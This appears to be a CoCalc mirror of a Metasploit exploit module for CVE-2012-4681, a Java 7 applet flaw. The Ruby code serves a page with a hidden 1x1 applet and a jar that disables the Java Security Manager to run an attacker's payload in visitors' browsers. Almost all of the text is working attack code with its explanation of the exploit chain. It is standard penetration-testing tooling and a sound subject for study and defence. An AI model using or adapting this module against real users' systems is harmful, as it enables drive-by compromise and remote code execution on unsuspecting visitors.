Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_exec.rb
19611 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
11
# include Msf::Exploit::Remote::BrowserAutopwn
12
# autopwn_info({ :javascript => false })
13
14
def initialize(info = {})
15
super(
16
update_info(
17
info,
18
'Name' => 'Java 7 Applet Remote Code Execution',
19
'Description' => %q{
20
The exploit takes advantage of two issues in JDK 7: The ClassFinder and
21
MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a
22
replacement for classForName back in JDK 6. It allows untrusted code to obtain a
23
reference and have access to a restricted package in JDK 7, which can be used to
24
abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can
25
actually invoke getField() by abusing findMethod() in Statement.invokeInternal()
26
(but getField() must be public, and that's not always the case in JDK 6) in order
27
to access Statement.acc's private field, modify AccessControlContext, and then
28
disable Security Manager. Once Security Manager is disabled, we can execute
29
arbitrary Java code.
30
31
Our exploit has been tested successfully against multiple platforms, including:
32
IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.
33
},
34
'License' => MSF_LICENSE,
35
'Author' => [
36
'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory
37
'James Forshaw', # Vulnerability discovery according to Oracle's advisory
38
'jduck', # metasploit module
39
'sinn3r', # metasploit module
40
'juan vazquez' # metasploit module
41
],
42
'References' => [
43
[ 'CVE', '2012-4681' ],
44
[ 'OSVDB', '84867' ],
45
[ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
46
[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],
47
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],
48
[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ],
49
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html' ],
50
[ 'URL', 'https://www.rapid7.com/blog/post/2012/08/27/lets-start-the-week-with-a-new-java-0day' ],
51
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=852051']
52
],
53
'Platform' => %w{java linux win},
54
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
55
'Targets' => [
56
[
57
'Generic (Java Payload)',
58
{
59
'Arch' => ARCH_JAVA,
60
'Platform' => 'java'
61
}
62
],
63
[
64
'Windows Universal',
65
{
66
'Arch' => ARCH_X86,
67
'Platform' => 'win'
68
}
69
],
70
[
71
'Linux x86',
72
{
73
'Arch' => ARCH_X86,
74
'Platform' => 'linux'
75
}
76
]
77
],
78
'DefaultTarget' => 0,
79
'DisclosureDate' => '2012-08-26',
80
'Notes' => {
81
'Reliability' => UNKNOWN_RELIABILITY,
82
'Stability' => UNKNOWN_STABILITY,
83
'SideEffects' => UNKNOWN_SIDE_EFFECTS
84
}
85
)
86
)
87
end
88
89
def on_request_uri(cli, request)
90
if not request.uri.match(/\.jar$/i)
91
if not request.uri.match(/\/$/)
92
send_redirect(cli, get_resource() + '/', '')
93
return
94
end
95
96
print_status("#{self.name} handling request")
97
98
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
99
return
100
end
101
102
paths = [
103
[ "Exploit.class" ]
104
]
105
106
p = regenerate_payload(cli)
107
108
jar = p.encoded_jar
109
paths.each do |path|
110
1.upto(path.length - 1) do |idx|
111
full = path[0, idx].join("/") + "/"
112
if !(jar.entries.map { |e| e.name }.include?(full))
113
jar.add_file(full, '')
114
end
115
end
116
fd = File.open(File.join(Msf::Config.data_directory, "exploits", "CVE-2012-4681", path), "rb")
117
data = fd.read(fd.stat.size)
118
jar.add_file(path.join("/"), data)
119
fd.close
120
end
121
122
print_status("Sending Applet.jar")
123
send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
124
125
handler(cli)
126
end
127
128
def generate_html
129
html = "<html><head></head>"
130
html += "<body>"
131
html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
132
html += "</applet></body></html>"
133
return html
134
end
135
end
136
137